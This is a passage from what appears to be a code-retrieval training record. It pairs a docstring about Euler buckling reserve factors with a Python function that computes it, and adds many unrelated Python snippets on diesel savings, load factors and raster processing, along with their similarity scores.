tmin = t_0\n return tmin", "def calc_electric_diesel_reduction (self):\n gen_eff = self.cd[\"diesel generation efficiency\"]\n\n self.electric_diesel_reduction = self.net_generation_wind / gen_eff\n\n electric_diesel = self.generation/gen_eff\n if self.electric_diesel_reduction > electric_diesel:\n self.electric_diesel_reduction = electric_diesel", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel 
generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def inventoryCapacity(self):\n # TODO: Worry about how +Strength and +Capacity gear could allow you to carry more than your capacity.\n if self.totalStrength <= 15:\n return int(6 * self.totalStrength + self._baseInventoryCapacity + self._equipmentCarryingCapacity)\n else:\n return int(90 + (self.totalStrength - 15) * 9 + self._baseInventoryCapacity + self._equipmentCarryingCapacity)", "def diff_l_sum_avail():\n def subtract(raster1, raster2):\n \"\"\"Subtract raster2 from raster1.\"\"\"\n valid_mask = (\n (raster1 != nodata) &\n (raster2 != nodata))\n result = numpy.empty(raster1.shape, dtype=numpy.float32)\n result[:] = nodata\n result[valid_mask] = raster1[valid_mask] - raster2[valid_mask]\n return result\n\n outer_results_dir = r\"C:\\Users\\ginge\\Dropbox\\NatCap_backup\\USFS\\model_runs\\precip_scenarios\"\n example_raster = r\"C:\\Users\\ginge\\Dropbox\\NatCap_backup\\USFS\\model_runs\\precip_scenarios\\0.5x\\post_decline\\L_sum_avail.tif\"\n nodata = pygeoprocessing.get_raster_info(example_raster)['nodata'][0]\n for multiply_factor in [0.5, 0.7, 0.9, 1.1, 1.3, 1.5]:\n results_dir = os.path.join(\n outer_results_dir, '{}x'.format(multiply_factor))\n predecline_lavail_sum = os.path.join(\n results_dir, 'pre_decline', 'L_sum_avail.tif')\n postdecline_lavail_sum = os.path.join(\n results_dir, 'post_decline', 'L_sum_avail.tif')\n target_path = os.path.join(\n results_dir, \"L_sum_avail_post_minus_pre.tif\")\n pygeoprocessing.raster_calculator(\n [(postdecline_lavail_sum, 1), (predecline_lavail_sum, 1)],\n subtract, target_path, gdal.GDT_Float32, nodata)", "def get_total_supply() -> int:\n return total_supply" ]
[ "0.5882945", "0.5823634", "0.57726854", "0.57467616", "0.5741599", "0.57414633", "0.5710871", "0.55506474", "0.54651403", "0.5430573", "0.5428441", "0.54128045", "0.53944397", "0.5361302", "0.535642", "0.53394634", "0.5322019", "0.53197694", "0.5309506", "0.5301232", "0.530022", "0.52987295", "0.52906734", "0.5287092", "0.52850485", "0.52696913", "0.52629864", "0.5246036", "0.52322215", "0.5228011", "0.5210022", "0.51905465", "0.518204", "0.5169943", "0.51448846", "0.51427823", "0.5116554", "0.511279", "0.5110827", "0.51092273", "0.510617", "0.50925726", "0.5086132", "0.508438", "0.5083437", "0.5081476", "0.50776327", "0.5075482", "0.5049715", "0.5046699", "0.50456583", "0.5042509", "0.5033329", "0.50328594", "0.503198", "0.5025129", "0.50105274", "0.5004199", "0.4996772", "0.49952048", "0.49876794", "0.49860978", "0.49860513", "0.49811885", "0.49804294", "0.497636", "0.4974732", "0.49664733", "0.49632525", "0.49581733", "0.49543062", "0.49542627", "0.4953676", "0.49495435", "0.49447113", "0.49438116", "0.49423724", "0.4937921", "0.49325305", "0.49250734", "0.4923298", "0.4921956", "0.4918844", "0.4917521", "0.4917422", "0.49152955", "0.49150658", "0.49057668", "0.48993322", "0.4898713", "0.4898488", "0.48982564", "0.48913914", "0.48863244", "0.4885471", "0.4884318", "0.48762396", "0.48742464", "0.48735347", "0.48719868" ]
0.517416
33
Calculate the reserve factor for Euler Buckling Failure by calculating the critical load and comparing it to the applied load. Return the reserve factor adjusted so that the inequality check is based around >= 0
def eulerBuckle(dim):
    bst = dim[0]
    tst = dim[1]
    tsk = dim[2]
    ZEAZ = (Est*bst*tst*((tsk/2)+(bst/2)))
    ZEA = (Est*bst*tst)+(Esk*tsk*bsk)
    zbar = ZEAZ/ZEA  # Neutral Axis
    EIbar = ((Esk*bsk*(tsk**3))/12)+(Esk*bsk*tsk*(zbar**2))+((Est*tst*bst**3)/12)+\
        (Est*bst*tst*(((bst/2)+(tsk/2)-zbar)**2))  # Using Parallel Axis Theorem
    NxEuler = ((math.pi**2)*EIbar)/(ribSpace**2*bsk)  # Critical Load
    rsf = NxEuler/Nx
    return rsf - 1.1  # Using a target Reserve Factor of >= 1.1
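A minimal usage sketch for eulerBuckle above. The module-level names it relies on (Est, Esk, bsk, ribSpace, Nx, and math) are not defined in the snippet, so every value below is an assumed placeholder rather than a figure from the original source, and the sketch assumes the eulerBuckle definition above is in scope.

import math

# Assumed module-level constants required by eulerBuckle(); the original code
# defines these elsewhere, so these numbers are illustrative placeholders only.
Est = 70e9        # stiffener Young's modulus (Pa), assumed
Esk = 70e9        # skin Young's modulus (Pa), assumed
bsk = 0.15        # skin bay width (m), assumed
ribSpace = 0.5    # rib pitch (m), assumed
Nx = 2.0e5        # applied compressive load intensity (N/m), assumed

dim = [0.030, 0.002, 0.0015]   # [bst, tst, tsk]: stiffener height, stiffener thickness, skin thickness
margin = eulerBuckle(dim)      # a value >= 0 means the RF >= 1.1 target is met
print("Euler buckling margin vs RF target:", margin)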
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # 
column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def ComputeRegenerativeBraking(self):\r\n pass", "def _load_factor(self):\n return self.size / len(self.buckets)", "def calculate_large_constant(self, bound, real_reduction_iterations):#factor):\n minimum_exponent = round(90/(real_reduction_iterations-1))#math.ceil(math.log(bound, 10) * factor)\n \n return ZZ(10 ** minimum_exponent)", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def get_additional_ball_capacity(self):\n return 999", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n 
return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def get_additional_ball_capacity(cls):\n return 999", "def load_factor_d_non_peak(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n\n average_demand = sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n max_demand_d = max(fueldata)\n\n if max_demand_d != 0:\n lf_d[k] = average_demand / max_demand_d # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def calc_fuel_given_ore(ore, recipes):\n\n upper_bound = None\n lower_bound = 469536 # assume ore needed for 1 fuel is good lower bound\n\n\n while lower_bound + 1 != upper_bound:\n if upper_bound is None:\n guess = lower_bound * 2\n else:\n guess = (upper_bound + lower_bound) // 2\n \n ore_needed = calc_ore_needed(guess, recipes)\n if ore_needed > ore:\n upper_bound = guess\n else:\n lower_bound = guess\n \n return lower_bound", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def E_BE(self,s,l):\n if s>l: return self.E_BE(l,s)\n if s == 0: return -100\n if l == 0: return -100\n delta = (((s+l)/l)-(l/s)) \n return delta-delta%self._tau", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def MINIMUM_BET() -> int:\n return 10", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses 
% self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def get_duct_linear_heat_loss_coefficient() -> float:\n return 0.49", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def penalty(self):\n return 0", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def compute_equilibrium(self): \r\n # First compute a valid lower bound for the total flow\r\n totalflow_lb = max(0, np.amax(1 - np.multiply(self.capacity, np.exp(self.beta * np.power(self.capacity, self.theta) + self.phi - self.b))))\r\n if totalflow_lb > 1:\r\n print(\"This network does not have equilibrium!\")\r\n else:\r\n # Compute the total flow at equilibrium z_star\r\n z_star = bisection_search(diff_totalflow_sumflow, totalflow_lb, 1, [1e-10, 1e-10], True, self) \r\n # Compute the flow over each route at equilibrium \r\n for i in range(self.num_routes):\r\n self.flow[i] = bisection_search(zeta, 0, self.capacity[i], [1e-10, 1e-10], True, self, z_star, i, 4)", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def overall_reduction(self):\n return 84", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def emission_factor(sheets, vehicleClass, speedRegime, pollutant):\r\n # get bc from excel. 
The year is hard coded to 2015\r\n f = sheets[\"Emissiefactoren CAR-VL3.0\"]\r\n idx = f[f.iloc[:,0] == vehicleClass + speedRegime + '2015'].index\r\n if len(idx) == 0:\r\n print(\"EFError: No ef corresponds to vehicle class {} and speed type {}.\".format(vehicleClass, speedRegime))\r\n return 0\r\n return float(f['EF_' + pollutant][idx])", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def calc_load_factor_h(data, fuels_tot_enduses_h, rs_fuels_peak_h):\n load_factor_h = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for fueltype, fuels in enumerate(fuels_tot_enduses_h):\n\n # Maximum fuel of an hour of the peak day\n maximum_h_of_day = rs_fuels_peak_h[fueltype]\n\n #Calculate average in full year\n average_demand_h = np.mean(fuels)\n\n # If there is a maximum day hour\n if maximum_h_of_day != 0:\n load_factor_h[fueltype] = average_demand_h / maximum_h_of_day # Calculate load factor\n\n # Convert load factor to %\n load_factor_h *= 100\n\n return load_factor_h", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def compute_lb_totalflow(self):\r\n lb_totalflow = np.amax(1 - np.exp(self.beta - self.b + self.phi * np.minimum(1, 1/self.l))) \r\n return max(0, lb_totalflow)", "def 
calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def workersNeeded(k, m):\n # formula: k/m\n from math import ceil\n return ceil(float(k)/float(m))", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def _calc_freeze_probability(self, num_iterations, final_fraction):\n return 1.0 - (final_fraction ** (1.0 / num_iterations))", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def get_amount_out(amount_in, reserve_in, reserve_out):\n assert amount_in > 0\n assert reserve_in > 0 and reserve_out > 0\n amount_in_with_fee = amount_in*997\n numerator = amount_in_with_fee*reserve_out\n denominator = reserve_in*1000 + amount_in_with_fee\n return float(numerator/denominator)", "def branching_factor(data, loc):\n\n return 20", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def bCheck(c, v, p, b):\n val = (v+1).floor()\n deg = c.degree()\n coeffs = c.coefficients(sparse=False)\n lcoeff = coeffs[deg]; coeffs.remove(lcoeff)\n check1 = [(coeffs[i].valuation(p) - lcoeff.valuation(p))/(deg - i) for i in range(0,len(coeffs)) if coeffs[i] != 0]\n check2 = (val - lcoeff.valuation(p))/deg\n check1.append(check2)\n bval = min(check1)\n return (bval).ceil()", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we 
use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def get_fuel_requirements(mass: int) -> int:\n return int(mass / 3) - 2", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def part3c_0():\n xs = exampleInput\n N = 10000\n\n difference = 0.0\n for ys, estimatedProb in submission.computeGibbsProbabilities( simpleCRF, \n submission.getCRFBlocks,\n submission.chooseGibbsCRF,\n xs, N ).iteritems():\n trueProb = nerUtils.computeProbability( simpleCRF, xs, ys )\n difference = abs( trueProb - estimatedProb )\n grader.requireIsLessThan( 5e-2, difference )", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 
